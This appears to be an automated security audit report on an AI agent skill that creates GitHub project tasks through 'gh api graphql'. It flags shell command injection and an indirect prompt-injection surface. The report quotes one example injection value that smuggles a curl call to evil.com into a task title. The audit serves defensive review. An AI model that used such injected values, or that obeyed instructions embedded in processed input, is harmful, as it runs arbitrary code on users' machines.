Skills
skills/sultanfarizbythen/skills/create-devops-task/Gen Agent Trust Hub

create-devops-task

Fail

Audited by Gen Agent Trust Hub on Apr 8, 2026

Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill's workflow instructs the agent to construct shell commands using the GitHub CLI (gh api graphql) by directly interpolating user-supplied strings into the command arguments.
  • Evidence: In SKILL.md, the instructions for creating a draft issue use <title> and <context if any> inside a shell command: gh api graphql -f query='... title: "<title>" ...'.
  • Risk: If a user provides an input containing shell metacharacters such as single quotes, semicolons, or backticks (e.g., Task Title' ; curl http://evil.com ; '), they can break out of the intended GraphQL query and execute arbitrary code on the host machine.
  • [PROMPT_INJECTION]: The skill exhibits an indirect prompt injection surface by processing untrusted data and using it to perform high-privilege actions via the GitHub API without sanitization or boundary markers.
  • Ingestion points: User-provided task titles and optional context/body text in SKILL.md.
  • Boundary markers: Absent. There are no instructions to the agent to treat the input as data only or to ignore embedded instructions.
  • Capability inventory: The skill utilizes the gh tool to perform GraphQL mutations, which provides broad access to modify GitHub project boards and potentially other resources depending on the environment's authentication token.
  • Sanitization: Absent. There is no requirement for the agent to escape, validate, or filter the user input before placing it into the command template.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Apr 8, 2026, 07:37 AM